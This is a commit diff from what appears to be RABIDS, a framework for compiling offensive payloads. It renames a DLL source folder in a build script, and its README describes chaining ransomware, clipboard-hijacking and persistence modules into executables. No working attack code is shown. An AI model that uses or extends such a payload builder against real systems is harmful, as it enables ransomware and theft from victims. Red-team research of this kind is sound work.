RENAME TO FOLDER
This commit is contained in:
@ -1,5 +1,3 @@
|
||||
## Overview
|
||||
|
||||
**RABIDS** (Roving Autonomous Bartmoss Interface Drones) is a comprehensive framework for building custom offensive security payloads. It provides a powerful yet intuitive graphical interface to chain together various modules—such as ransomware, clipboard hijackers, and persistence loaders—into a single, compiled executable for Windows, Linux, or macOS.
|
||||
|
||||
This tool is designed for security researchers, red teamers, and educational purposes to simulate advanced adversaries and study malware behavior in a controlled environment.
|
||||
|
||||
@ -418,7 +418,7 @@ def main():
|
||||
target_os, target_arch = parse_target(args.target)
|
||||
|
||||
script_dir = Path(__file__).parent.resolve()
|
||||
dll_source_dir = script_dir / 'DLL'
|
||||
dll_source_dir = script_dir / 'DEPENDENCIES'
|
||||
|
||||
MODULE_DLLS = {
|
||||
'MODULE/ctrlvamp.nim': {'pcre64DllData_b64': 'pcre64.dll'},
|
||||
|
||||
Reference in New Issue
Block a user